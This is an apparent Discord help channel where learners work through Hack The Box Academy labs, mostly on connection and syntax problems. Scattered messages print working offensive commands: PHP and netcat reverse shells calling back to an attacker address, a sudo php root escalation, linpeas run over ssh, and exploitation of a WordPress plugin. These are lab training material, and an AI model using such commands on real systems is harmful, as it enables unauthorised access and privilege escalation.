#modules

it keeps giving me a mismatched certificate error. im probably doing it wrong ig :/

Okay i did the thing but it doesn't show me a build number its just blank but it comes up? did i miss a step?

but then, I decided to do it on my own computer and it worked when id id the same commands? so is it safe to say I understood that and can move to the next step or should i keep trying to see why its blank...

what section are you on?

Introduction to Windows, the very first one in the module 🤣 it keeps returning it as blank I am so confused, doing it on my pc it shows my build but not the website it shows blank and not what my workstation should be? have I completley misunderstood 👀

did you successfully RDP into the target?

I dont know 🥺 it doesnt give me an error just a blank build number !!!!

this is what it shows

oh i cannot post a ss lol

but yea ill type it

Version BuildNumber

thats it no numbers nad

Make sure you RDP into the target, I ran the powershell as administrator as well

i hve no idea how to do that. I have to go learn how.

replace <targetIp> with your target IP and Password with your password

xfreerdp /v:<targetIp> /u:htb-student /p:Password

replace <targetIp> with your target IP and Password with your password

My password not the one on the site?

Okay, let me try that. brb

the one listed when you spawn the target

for example this was mine

xfreerdp /v:10.129.186.30 /u:htb-student /p:Academy_WinFun!

thats what I did.

with the other commands :/

was that wrong?

you need to do that first, connect to the target PC running windows, run powershell from in there, with the commands in the example Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber

Ohhhhhh! I think from what you said I think I see my mistake. I put all the commands together so what I did was this || └──╼ [PS]> xfreerdp /v:10.129.63.228 /u:htb-student /p:Academy_WinFun! Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber || in one line.

must I break them up do one first then the other?

cause what I did returned the options to give a build number and version but they were blank.

yeah do this first xfreerdp /v:10.129.63.228 /u:htb-student /p:Academy_WinFun! Get-

xfreerdp /v:10.129.63.228 /u:htb-student /p:Academy_WinFun!

then once you connect to the windows machine open powershell and run the 2nd command

Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber

the xfreerdp command is RDP (remote desktop) connecting you to a windows machine, once connected run the powershell command from the windows machine

okay let me try that.

guys

why is my instance not letting me access ssh? permission denied with password

Hi, i am stucked at Windows services & processes i cant find standard update service running on the host. I try ||Get-WmiObject win32_service | select * | ogv|| , where i filter description, name, status and next i try command ||Get-Service | ? {$_.Name -like "Update"} | fl|| still no service. I too try every running function put to result and still i haven't answer. Can someone give me hint pls?

are you sure that is the correct section you are on? I don't see where you are running those commands in the module?

Oh my gosh I am such a dummy holy hell

tysm! i am a dummy lol i never ever got to the windows machine it kept giving me the error till i said trust it then it showed up and now im in a win 10 machine 🤦

finally 🙏

awesome! good job!

Oh my gosh the second one was easier.

Hey everyone. I think I am also stuck in the same place. I just started htb and am on the windows fundamentals module. How do I connect to a windows machine?

There's a comment just above with the remote desktop command xfreerpd

Yeah, I saw that. I used that in a bash terminal in the workstation and it just gave an error

Oh yea you have to say trust it.

I kept getting an error too.

trust it?

But oof you're smarter than I was lmao 🙏 🤣

like run as root?

yea when it says the error, (y/t/n) just put t and it connects.

oh ive forgotten what I did 🤔

brb

my error is bash: 10.129.211.15: No such file or directory

Hmm. what are you typing?

xfreerdp /v:<10.129.211.15> /u:htb-student /p:Academy_WinFun!

That the IP and password that got generated for me

Maybe remove the < > from the IP?

I didn't put those.

OOooooooo!

That worked!

Yay! 💞

That's a little bugger that the prompt had those in there and its not obvious to remove them.

Thank you so much!

Haha! ^^ and np 👍 glad I was able to.

Which option needs to be set to create a home directory for a new user using "useradd" command?

does anyone understand this one?

I have tried everything, but won't work

User Management on Linux Fundamentals

I have tried, useradd -d -m su, useradd -m su, --create-home

etc

anyone can help me?

Hey, I'm sorry I cant help. I just got started and don't know where you are at or how to help. Someone will be along soon who can help

I'm stuck in Public exploits, I'm trying:

||auxiliary(scanner/http/wp_simple_backup_file_read)||

I don't know how I'm supposed to find the path to flags though

You must just put in the option.Don’t put in the command together as it says “which option “

GETTING STARTED
Page 9
Public Exploits

im stuck there too

search exploit <type exploit here> does not work

search <type exploit here>

that works in msfconsole

however, i cant find wordpress in searchsploit

but i see wordpress in my nmap scan

i also tried seraching for wordpress and the version number in rapid7 but it returns 0 results

i followed everything from the section

i also tried an ssh exploit that i managed to search for successfully in msf only because i did an nmap scan using the vulners script which was not mentioned in the section. however, when i follow the directions in the section, the exploit runs successfully but does not give me a shell.

i even tried connecting to the ip and vulnerablle port using netcat but i still dont get a shell

Hey, so the hint should say use searchsploit to look for "plugin" exploits. I successfully found an exploit within MSF to read the flag.txt file from the service running on the target. PM me if you have any questions.

can anybody help me? module about sql injection

Anyone available to assist me with privilege escalation send me a pm... I’m all sorts of stuck

im still stuck on this

GETTING STARTED
Page 9
Public Exploits

people tried to help in a pm but they dont make any sense

im trying to get the wordpress version from a service scan on the target port but if i browse to the target port and ip it says wordpress is a different version

there has to be a way to get the proper version from nmap

and i guess its not possible to get the plugin exploit from searchploit like the section suggests because no one has successfully done it that way

2 people have now told me to use rapid7. even wpscan shows a different version than what is shown in the browser

Hey, I'm currently working on the linux fundamentals course, the Service and Process Management section asks me to use systemctl to submit the unit with the "Load AppArmor profile" description. I ran " $systemctl list-units --type=service " no luck finding a unit with the description. I'm not sure what to do at this point, there's so much info in man systemctl I'm not sure where to start.

I think you should use the grep command to find the file more easier

Just add the grep command behind the command you used

Hi

it's Windows fundamental module #4 question

I have a problem with the "Getting Started" Page 9 "Public Exploits" flag.
You are supposed to exploit a plugin. Since the website is filled with all the "simple backup" plugin stuff I was thinking about this one and searched for an exploit. This returned the exploits: “wp_db_backup_rce” and “wp_simple_backup_file_read”
Unfortunaly I can’t get either to work since for the rce one I need a username and password which I’m unable to find and the “wp_simple_backup_file_read” won’t do anything but give back:
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

Since I have to extract the flag.txt I feel like the “wp_simple_backup_file_read” is the right one but I can’t get it do work.
Could you give me any hints?

im stuck on that module and section too. ive been told how to solve it but it does not relate to what is taught in the section. i would like to know how to properly do the nmap scan and properly find the exploit in searchsploit as suggested in the section.

because the nmap scan i have done is returning with the wrong wordpress version

Try browsing to that ip for finding the plugin

thats what i was told to do was to use the browser, but thats not a real world scenario

it doesnt help me learn how to properly find an exploit and use it in metasploit

I mean the page tells you about the simple backup plugin stuff so is was thinking about exploiting this. Is this even the correct way?

I searched for exploits for that plugin

but browsing a webpage doesnt normally tell you what version a plugin is using

And then I'm stuck on this knowledge check section for three days that I do not properly recall how I found the flag..

This one does..it's on the page title

i know but i mean thats not a real world scenario. i though the academy is supposed to teach us the proper way

which would be with an nmap version scan first

or wpscan

Yes and it gives you like 4 but 2 of them I don't see any use case in this one. The two others are named “wp_db_backup_rce” and “wp_simple_backup_file_read”

i was told you need to compare that to the plugin version for the correct one

or it at least limits it to 2 exploits or something

then you read about what each exploit does

@frigid viper @atomic light Yeah this is the correct path.. the plugin has file read vulnerability.. use the proper tool for searching exploits and make sure to set the options correct.. you will get to read the flag...

I tried doing it again... As I had forgotten how I did it earlier

Yes I used the wp_simple_backup_file_read with the ip set but it just returns
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

Yes.. check all the options

which option do i have to tweak in order to get it working?

There are 2 more which you have to set...

Check the question again for hints...

Ok, wait a sec I'll try it again

how ddo you know what directory the flag is on if we cant open a shell?

i was thinking about it just being /flag.txt but im not sure on this one. I cant figure out which second option i should set, mabye vhost or depth?

i set FILEPATH and RHOSTS

filepath i set to /flag.txt

it didnt work when i run metaploit

It could also be the /simple-backup/flag.txt since the text on the plugin states, that the backups will be saved in the simple-backup directory

where did you find that path?

went to the webpage there it stated, that it will save it in the simple-backup in root (screwed up on the wp-admin thing sry) so it should be /simple-backup/flag.txt ?

didnt work with that path either. maybe it needs to be the full path

i also tried LHOST tun0 didnt work

and i tried LHOST my host ip

didnt work either

i get the same thing as you

RPORT in the exploit is set to 80...(by default...).. it's different in the question

oh but the section says to change options that arent set

what a red herring. ill try that

omg i got it. Thank you so much man

👍👍.

got it too

Were you able to find root.txt?

Module: Getting Started
Section: knowledge check
Managed to run a getsimple metasploit to gain access to the first flag. However, the Meterpreter pseudo-shell supports limited commands like cd, ls and cat. How should I get a LinEum.sh/LinPEAS.sh script on the target and escalate privileges?
I tried the shell_to_meterpreter exploit too... But I can't use any other command, other than ls, cd or cat.

Can someone nudge me on the skills assessment for SQLmap Essentials? I don't find the vulnerable link, nobody is answering in the easy-modules channel

Thank you very much, worked perfect! 🙂

Hi guys i need help at Local File Inclusion... I have found some Credentials to log in to mysql but i can't connect to the host no matter what i try. Can somebody help me pls?

Hi friends, I'm still in the Linux fundamentals, in section Working with Web Services. The first part asks me to install apache2. However the instance on the website won't let me run the apt install command as root. I get a message saying "htb-student is not in the sudoers file. this incident will be reported."

Is there a way to get around this? Because I can't do the next exercises without apache2 installed

you dont need an apache 2

read the text

MODULE: SQL Injection Fundamentals
SECTION: Union Injection
QUESTION: Use a Union injection to get the result of 'user()'
I don't understand what the question is asking

Get the result of user() with union injection

what does user() mean?

some content in the db i blindly guess

haven't done that module nor read it

ok

i stuck

@hearty saffron try to follow as the module explain try to execute user()instead what was used in the example

Can anyone give me a nudge on privilege escalation module in ‘getting started’? I’m stuck trying to ssh to root

it says unknown variable user

can you get socat on there? socat might get you a full tty shell. i used it on the linux privledge escalation module. then i escalated to root priviledges with a gtfo bin.

im not on the knoledge section yet though. i just woke up.

can tell me what page so I could look ?

section is called Union Injection

module is SQL INJECTION FUNDAMENTALS

@mint lava

try to do as the module says on the ssh keys

dm me

Hi i am hard stuck on web requests. To be more precise on the Post Method on the Question where i have to use POST and GET requests with Burp to get to the admin user. I have a Target and the credentials (guest:guest). I know that a side uses a Cookie to identify me as guest and i can use base64 to decode it. And when i edit it and send that as my setted cookie the site shows me that the cookie was eddited because the decoded cookie is shown on the response html code. But nothing of that response helps me to get the points for the question so i must do something wrong and i dont know what.

try to change the guest cookie to something else

i changed the guest part in it to admin

but no flag there

why only the guest part

the number after guest_ is to identify the different guests

So i have no information about what a correct number after that is. I thought that i can promote myself with that

try without numbr

well i just put to much thought in it

thank you

I’ll dm you

Can someone nudge me on the skills assessment for SQLmap Essentials? I don't find the vulnerable link, nobody is answering in the easy-modules channel

What non-standard application is running under the current user ? (The answer is case sensitive).

stuck at this question of windows fundamentals, tryed so many apps

Open task manager and check what application doesn't come installed in windows by default

yea multiple didnt

but ill try again

thx

When you open the task manager, there should be details that might be helpful

can i dm you

coz i see alot of applications that shouldnt be there on default

sure

Does someone else has problem with Getting started module-Knowledge Check it seems that the target is down

I tried to re-spawn the target several times

Have you try to refresh the page, and then re-spawn the target machine?

yes I did

as you can see, I re spawn 3 targets

Does anyone else has that problem?

Is there any staff member available that can check that issue?

I don't know if I'm just missing something wildly obvious, but could I get some help/clarification on what the GET Method question of the Web Requests module wants me to do? I'm not sure how to go about getting what it's asking for

give me a few

Thank you

What is the question maybe I could help

I need to send a GET Request to flag.php with two parameters num1 and num2 such that their sum is 1337

do you understand what you need to do?

Not really if I'm being 100% honest

DM me

What did you use with nmap to get a result? I found it was wordpress via the web browser but couldnt seem to get anything back from NMAP?

i was able to get the wordpress service and wordpress version from nmap but i couldnt get the plugin and plugin version from nmap. ill pm you.

@drifting knoll got anyting?

we're working on it, can take a bit

its ok I just wanted to know if there is a problem

thank you

The Nibbles machine won't work for me either with several respawns on the target! I was about to ask about this and saw that it is being worked on 🙂

File Inclusion / Directpry Traversal
--- skills assessment ---
I have letarally tried evrything that the module says, but with no success.

||I was even able to read the source code for that “invalid input detected” text.||

But I’m not getting any further. Could anybody here give me a hint about it ?

--- PLEASE ---

what module is that one?

The module is "File Inclusion / Directory Traversal"

Sorry I have not done that one yet...

that's ok

you need help with something ?

I'm stuck on Public Exploits on the Getting Started Module.... I think I'm going to work on the intro to web apps for a bit to clear my head.

No.. like I found the vulnerabilities but couldn't get a reverse shell using netcat/socat.. (used mestasploit).. then I found the user flag.. but I just can't figure out how to get the root access..
I will be leaving this module for now.. will try completing others and maybe solve a couple of machines and then come back to this question.. because it is taking a lot of time.

If I figure it out I'll let you know. I'm not at that section yet. I've been taking lots of breaks. I usually knock off like 1 or 2 sections when I wake up in the mornings. I'm in bed right now and looking forward to tackling it when I wake up.

Sure buddy👍.

for the life of me I can't remember how to rdp

https://www.thewindowsclub.com/how-to-use-windows-10-remote-desktop-in-windows-home-rdp
https://support.microsoft.com/en-us/windows/how-to-use-remote-desktop-5fe128d5-8fb1-7a23-3b8a-41e636865e8c

I'm sorry I should have been more clear....i need to rdp into a target using the command shell from parrot

how you tried xfreerdp / rdesktop / remmina? I haven't done this module - I am just providing some assistance.

remmmina

I think xfreerdp was the one I was trying to remember

thank you

Any tips/nudges for the priv esc section of the getting started module?

hello

hi!

what have you tried so far?

which box do you make?

Hello

I'm replying to PapaShango, he is trying "privilege escalation" section of "getting started" module

@slow salmon I’ve looked for misconfigured files with Suid, cron jobs and public exploit for vulnerable kernel versions

pm me

@patent blaze try to use PHP wrapper to view the source code

Hello all!! Bit of a noob here and been stuck on this for the past couple of days: Linux Fundamentals; Working with Web Services; Find a way to start a simple HTTP server using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number). Have tried numerous commands... any pointers? Thanks.

👆 I have the same question as AnneBonny. I've tried all sorts of commands and nothing I have tried is being accepted for the answer.

I have been to both the websites below (and many more besides) and have tried variations on these commands. Am I missing something fundamental? Thanks.

https://jasonwatmore.com/post/2016/06/22/nodejs-setup-simple-http-server-local-web-server

https://www.npmjs.com/package/httpserver

Hey all
in the SQL Injection Fundamentals module i have a problem connecting to the remote mysql databse i keep getting this error am i doing something wrong ?
sudo mysql -uroot -h206.189.121.131 -P32193 -p
ERROR 2003 (HY000): Can't connect to MySQL server on '206.189.121.131' (111)

@latent crest If I'm not wrong you have to put a space after "u", "h" and "P" parameters

tried it that way as well sadly nothing

GETTING STARTED
Page 11
Privilege Escalation

im trying to download linpease from my simplehttpserver to the target but it wont connect

ive done wget <my_ip>:8000/linpeas.sh on the target

Just finished this module. Search how to use your current shell

but im not trying to escalate priviledges yet. i just want to enumerate with linpeas

wget shows its trying to connect but it keeps failing and retries over and over

Have you set uo your listener in the right directory?

i started the listener in ~/

the same directory as linpeas

i even tried restarting the instance and target

hello please can anyone help me with system information quetions in Linux fundamental module

i tryed a lot of answers that did'nt work

hey! Can anyone help me with this... i am googling from last 30 mins 🥴
Find a way to start a simple HTTP server using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).

What question are you stuck on, I could help

GETTING STARTED
Page 11
Privilege Escalation

my reverse tcp also isnt connecting back to me. it times out

@left flicker @obtuse igloo You need to assume that npm is installed on your machine. Try to google man npm

HTB Getting Started module, Knowledge check. I'm stuck with p23 root-flag. I've run my LinEnum.sh and uploaded a webshell so that I can e.g. browse files as www-data, but just can't figure out how to break out as root.

Thanks! Having a google now 😉

Source code of what ? Beacuse I did saw the source code of that error message

@patent blaze Did you manage to view the source code?

you know that error message “invalid input detected” ?

i did saw the source code of if

of it**

Hi everybody!! I been stuck in last part of module "Getting Started". Please, anybody can help me? Thanks in advance! 🙂

gonna dm you

Can anyone tell me why my netcat command doesnt work? ... it looks like the example, but no luck ...

Try nc or ncat

no luck 😦

to me, it looks like netcat is working, simply the target address is not outputting any banner

press return a few times see if it comes back with something

or use the -nv options

yeah, use the -v option to see if the connection is actually happening

hmmm interesting... I have re-spawned a few times with same result .

And it eventually returns

]$ netcat 188.166.168.204 22
^[[28~(UNKNOWN) [188.166.168.204] 22 (ssh) : Connection timed out

-v didn't help unfortunately

Thanks for the suggestions, I've no idea what im doing with it lol ... off to Google I go 😆

try to search PHP wrappers to view source code, You can DM me if you want

I was able to run linpease via SSH on the target. I havnt figured out how to get root access to read flag.txt yet but leanpeas did work

How did you download linpeas to the target?

I can't get anything to connect to the target, only ssh

Wget doesn't work

i didn't I ran linpeas over SSH tunnel.

It works like that?

I'm going to try uploading linpeas through scp

let me know if that works, not sure youll have access without gaining root first.

If it's like linenum it doesn't need root

this is what i ran ||ssh user1@188.166.168.204 -p32495 'bash -s' < ./linpeas.sh|| this was from within the directory that has linpeas in it

Or maybe I'm thinking of another program

K

Hey I am stuck on the last box in the Getting Started module. I was able to get a meterpreter shell on the box but I can't use any commands on the machine to be able to set up a reverse shell. I can use commands like ls,cat,cp,mv but I cant use any of the binaries in /bin and I cant figure out how create a executable so I can set up a reverse shell.

i managed to upload linpeas to the target through ssh and did chmod to the file while on the target

i was then able to run linpeas and get a password but it is not working for user2 sudo password

im not sure what to do with this password

Any help with skills assessment File Inclusion / Directory Traversal

sounds like maybe were at the same spot? I got the first flag but can't figure how to traverse to sudo to read the 2nd flag or chmod

i still havent gotten the first flag

@rustic sage i am having the same issue

i found the flag but cant read it

I do nc/netcat on the target and it just freezes

yeah nc doesnt connect and times out

also wget doesnt connect and times out

but i can upload files through ssh

so maybe i need to do nc or socat on the ssh port?

https://github.com/danielmiessler/SecLists/pull/581

Do you see the directory user2 has access to?

any clue on that part? I wasnt able to retrieve a password...

yeah user2

hint ||/bin/bash||

in linpeas find the line that says file needs this password:

i thought that was for the gtfo bin for user2 which i dont have access to?

i also cant get a full tty shell because i cant get netcat to connect

i need a full tty shell for the gtfo bin to work

you can get that first flag with just ssh

im on ssh but its only ssh for user1

i'm doing the linux fundamentals module; i can ping the machine that's started but cannot ssh into it... halp?

you have username@ip address?

yes for user1 only

want another hint?

yeah; it's provided in the module htb-student@<ip>

but it just hangs and eventually times out

make sure to remove the <>

yes please

oh you meant for martian lol

nah that was for you, ||sudo -u||

oh

it was removed by the bot i think

pm me

sorry I'm confusing... the <> was for blackmartian

i put the actual ip there, lol

are you using it like this? ssh user@10.10.10.10 -p 445
-p =port

🤦 non-standard port

right, just change it to what you need

to be fair, i started the lesson a while ago and came back to finish it; i mustve forgotten it wasn't on 22

why is it that when I use "ssh root@ip -i id_rsa" I get connection timed out?

... or is it? looking through the module, no other port seems to be used 🙁

can someone hint me ?

turned out VPN running on host machine was the culprit; paused it and i can ssh in 🤷

Anyone done the offensive getting started? I have a question

nvm im an idiot i figured it out

Hi there everyone!

I just started using HTB Academy, I'd like to make some friends here.

Feel free to say hi😁

Hi

Which module are you currently working on?

File inclusion

I'm doing the Linux fundamentals module now

sure you can dm me for the advise

Damn bro😂

You're my senpai then

I got a lot of helps from here

lol

Arigatou senpai🥲

Arigatou😆

Welcome to the team Rudhraa!

Thanks for having me

😁

We're all in the same boat. Feel free to ask for help 😉

👍

sure thing bro

the funny thing is, I started looking into cyber security after watching Mr. Robot

Originally i have programming background

But this is hella fun bro

Btw guys, I've been stuck on the wrap up exercise of Getting started. Is there anyone I could ask some questions about php? About parsing and reverse shells

Hahaha that series is a trip

Php? What is it about?

Like it seems like loading a bash command with redirection in it breaks the script, since the > sign seems to close the php command. At least this is my interpretation. I'm looking for a way to overcome that

I'm trying to load the classic 'system("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc [ip addr] [port] > /tmp/f")'

I'd love to help you if i know how too... sorry bro. Bet others in this group can help you.

No worries bro. Appreciated 💪 💪 💪 💪

I managed to solve it!!!!

😭 😭 😭 😭 😭 😭 😭

Tears of joy!!!!

Hahaha I actually only overcame that issue. Gotta continue the challenge though hahaha

hahaha

happy for you brother

senpai kakkoii!

🤩 🤩 🤩 🤩 🤩

ayesha

the last five 🤓 😢 😫

Всем Привет!

у меня есть сложность с пониманием запуска payload: www-data@gettingstarted:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

English only pls, so others can understand what you want too

i want run this code: php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);/bin/sh -i <&3 >&3 2>&3;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

why don't you try something simpler first?

What does this entry mean? User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/var/www/html$

do some research about sudoers file

Because I have to pass the last test at the Academy.

i know but it isn't necessary to obtain a reverse shell, is it?

how else to increase privileges?

what does your code do?

as User launches nc reverse shell.

with root

using what?

can someone help me get htb-student's mail? Module : Linux Fundamentals

check your environment

sorry for noob question

can you elaborate?

read the section carefully and you will see how to do so

I can't I am stuck it's been 20 mins

read it again

can you give hint?

already did

The idea is this: I have a user. I know that I can run php command without a password on behalf of any user. and I want to call as root reverse _shell on terminal. thus get root rights. found the command at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#php

thats a good approach but why would you want to run a complex code that has great error potential instead of a simple command that gives you the answer you need?

command to do what?

depends on what you want
what does the exercise want?

Hello im new to htb and im trying out a module in the academy but im stuck at this question:
"Perform an Nmap scan of the target. What service is running on port 8080? (two words)"

The command + the output is:

nmap -Pn -p8080 10.129.227.149
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 11:18 UTC
Nmap scan report for 10.129.227.149
Host is up (0.010s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds```

And should the anwser be "http-proxy" then?

it won't accept

/var/mail

check Nmap man page

I ran linepeas.sh and saw these problems in my system setup. escalatoin priv

@drifting knoll sorry for ping btw

it doesn't answer my question

you didn't check your environment

i did and thats how the commands should look like

this is what I got MAIL=/var/mail/htb-student

what is the question asking you for?

Hello. try the same thing but through Start Instance (Pwn)

root flag.txt 😆

so you actually just need to read it, don't you?

@drifting knoll

@rustic sage stop pinging

k sorry

help pls

I'm stuck

There was the same problem. shows one text through his terminal, and another text through pwn in the browser

gotcha

done yo

thanks

what does the question ask you for?

What the name of the service is because i thought that its http-proxy

yes

done ty

you mean like the instance in the browser that can be created?

so why do you want to run a reverse shell?

which options of Nmap you can use?

The hint seems clear, but there are no known ways to read the file as root. except for the method of obtaining first administrator rights and then reading the same file.

there are a lot of ways to execute shell commands using php

In any case, it will probably ask for a password of rights.

or not?

try it out

is there a link to a resource? or does google help us?😆 👍

yes

i did but the output is the same

@quaint marsh try to look at https://gtfobins.github.io/gtfobins/php/#sudo, I used it to obtain root without running another nc session as root

👍 thk

@quaint marsh feel free to dm if you want

In the linux fundamentals module, do you have to spawn the target to be able to do the questions ?

Where do I have to put that ?

in your Pwnbox instance, run the following command:
ssh htb-student@<target-ip>

Thanks

Thank. helped!😀

CMD="/bin/sh"
sudo php -r "system('$CMD');"

By the way I'm new here too. Just started using discord today

Hope to make friends with all you guys😁

pls be careful with spoilers

Guys, what other ways can you use to arrive with an answer for this question "Which shell is specified for the htb-student user?". I used "echo $SHELL". Thanks in advance

Noted, I'll just an hint next time

PORT STATE SERVICE VERSION
32369/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site

We have a Plugin Simple Backup 2.7.10 for WordPress. He has a vulnerability: The Simple-Backup Wordpress Plugin Was Affected by An Arbitrary File Download Security Vulnerability.

Question: Where to read about the introduction of code in HTTP to receive a file (flag.txt)?

There is no accurate description about vulnerability. where to look? says about ../../

CWE 22

Hey all could soemone plz help me out?
I'm on Getting Started - Privilege Escalation
I loaded linPEAS on the target using ssh got a whole bunch of info
but im too much of an ape to understand what to do next ...
im in the target as user1 and i need to escalate to user2.
I'm too dumb to figure understand what I need to do next...
plz halp!

https://tenor.com/view/awful-idea-grinch-i-have-an-idea-a-wonderful-idea-gif-15543357

Public exploits passed?

you mean, look for public exploits for programs on the box?

нуы

yes

k, i'll try that

🤷‍♂️

Could not pass?

Hey all I'm on Getting Started - Public Exploits and am stuck on something, could I msg someone with a question?

It is still interesting here, whether you need to access User 2 first (because it has the ability to run with root privileges) or immediately look for ROOT rights?

vector sudo 1.8.31 -> patched not vuln.

yeah its running sudo 1.8.31 so its patched

yo!

I've got a simple question that is stumping me would anyone possibly be willing to help?

I'm stuck on Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)

i don't know too!😆

I looked up sudo and tried some of those commands but nothing seems to be working

I try su and this doesn't pull anything up 🤔

Has anyone walking this path?
sshd: process found (dump creds from memory as root)

off to the market for now! I'll jump back in later to see if I can get this figured out!

So excited that I got to hack my first box last night! Small potatoes for most but it was super exciting for me!

damn guys, i am ending the "get started" module but the site you could follow with the IP is slow as hell and i can't continue with the admin page. Did you have the same problem with the last knowledge check point ?

yes

But through the terminal everything is fast

how can i enter the /admin/ page with the terminal using the username and password i found ?

same here, the website is extremely slow

is it posssibe to switch targets? cuz i have no idea if im connected to the target i need to

says my target is htb student and when i type whoami it says another user

Read through the directions then and double check you have done what you need in order to get to where you need to be.

Ill try my best then TY

I figured it out

you need to pull up a list of su command options

Anyone help me with the web requests - the hint says manipulate the cookie.. I've tried re-encoding with the admin_xxxxx rather than guest_xxx but this only seems to change the banner. I'm not getting a PHPSession ID either...

not quite there yet

.-. i just needed to do SSH username@target lmao

and i forgot

Hello. I'm completely new to cyber security, and I'm attempting to take the fundamentals course. I'm trying to access the target SMB share folder to access a file. I'm completely at lost here. Any tips to get me going to the right direction?

hey crazyhorse, im stuck in Getting Started Privilege Escalation ... i cant figure out how to get user2. could u give me a hint plzzz? i sshed in and ran linPEAS over an ssh tunnel but im too dumb to figure out what to do next...

check your port. What is the port of the target?

love that screenname

Is anybody able to help? I'm completely stuck

thanks

You're further along than I am

@odd tree ahh shame :/

It's weird how it's a fundamentals module and I get stuck right in the beginning, makes you feel so dumb xd

I mean I came here cause I was stuck on something you're well beyond. We're all just learning to walk right now so the pace really does seem like a crawl to me

But we will get there

I literally took the fundamental module, what more basic is there?

is there something i should do prior to this?

I'm on the "Getting started" fundamental module. Is there somewhere else i should start?

I'm at the end of the module atm. and until the "Knowledge Check" you really just have to repeat the things shown and add a little spice

With the SMB txt file i tried all the commands

think about the code you learn in that session ||sudo -l|| and what you can do with that knowledge. At that point you should get user2 pretty easily

but nothing semes to work

What lection is it?

Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.

Service scanning

i think

i can't physically connect to the admin page because the site is to slow.
Do you know how to use "gobuster" using the username and password to visit the site ?

Nah, ill try tomorrow and hit u up if i got something 😄

@odd tree my problem was that i typed / instead of \ 💩

#hacker

@elfin bridge try to run http-enum script on the target. then look at the results and continue form there

Tried is with the target port, same issue

WOOT! good job on figuring it out

i have already did that but except learning the username and the password, the site is to slow to navigate on admin pages

@elfin bridge did you find other directories? try to find any information about the version our target and search for exploit that you can use

ok perfect 👌 i'll try that

env command

--command

--command

Hey, I'm stuck in the Getting Started Module on Privilege Escalation. I was able to get to user2 but could not get to root no matter what i tried. I would be thankful for a hint on where to look.

hello, in the web requests modul post method section i succesfully manipulate the cookie. I got the admin panel, but the flag is incorrect. Anyone can help me?

Public exploits task. do i need to scan with wpscaner?

ssh user1@IP -p (port)

ssh

Ok, thanks. I'll look more closely at this

hi all, i just finished the linux fundamentals. i had a little trouble with the curl https://www.inlanefreight.com question. i did get it but i was wondering if someone could DM me so i could ask about a better way to solve it without giving spoilers in the room. I got to the point where i used grep but still got four extra URLs. Using sort, I could easily identify the four i did not need. I'm looking for a cleaner way to get the result. I think I need to be more specific in grep but I have man paged and google-fu'd my best.

i feel really dumb right now, but how do i get the banner of the server in Getting Started: Basic tools? when I do ssh user@ip.address it says that it can't resolve hostname?

@amber shuttle do you have to start the instance for the user you want to ssh at the bottom of the page before the questions?

uh

i started the instance

I also did not understand for a long time because of an inaccurate question. ||num1&num2=1337||

@amber shuttle so, i just started this one to see what you meant. they don't give you a user. all you have is the ip:port does that help tell you what to do?

I wonder how you found this particular plugin, ||but you're right||! better look at what it says! he saved the answer to a file !!!

@amber shuttle i have to get going but if you run into more trouble, when I did this just now it wouldn't load, so i ran the command from my native machine's terminal and it worked.

hello I am new to htb and I think I'm in the right area to ask for help. im currently stuck at system information on Linux fundamentals. I think im connecting to correctly and attempting to enter the password but its keeps saying permission denied, any idea on what im doing wrong?

nvm I had it backwards woops

Hi, Im having some trouble with the package management part of the linux fundamentals module. I made a folder and cloned evil-winrm into it but in the files that got downloaded I'm not really seeing anything that looks like a package I could point apt at to install

wait I think I was using the wrong github link there... give me a minute...

Hi guys im currently working on FILE INCLUSION / DIRECTORY TRAVERSAL, and im stuck on first question about this

" Submit the contents of the flag.txt file located in the /usr/share/flags directory."

i tried every method but nothing works im getting this error message on the target website

"Warning: include(expect://id/usr/share/flags): failed to open stream: No such file or directory in /var/www/html/basic/index.php on line 47"

"
Warning: include(): Failed opening 'expect://id/usr/share/flags' for inclusion (include_path='.:/usr/share/php') in /var/www/html/basic/index.php on line 47"

nope, still only seeing md and png files being installed, back to square 0

Why is it that for the website of Knowledge Check I can login as admin, but when I use the same credentials for metasploit it fails?

https://academy.hackthebox.eu/module/18 <-- This is the Linux Fundamentals Module, I'm on the "Find Files and Directories" one. There is this question, "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?", I know for a fact that I'm typing the right command and I even used the '2>/dev/null' option with it, yet still the files I find don't seem to be the answer. Any help here please?

@graceful prism can you share the command you're using?

@scenic apex try to use PHP wrapper to view the source code

@scenic apex pls be careful with spoilers

and dont share any answers

thanks @mint lava but im stuck on that question can you give example

oh im sorry i will re type it

google how use PHP wrapper to view the source code

thanks

if you still need help feel free to DM me

sure thanks!

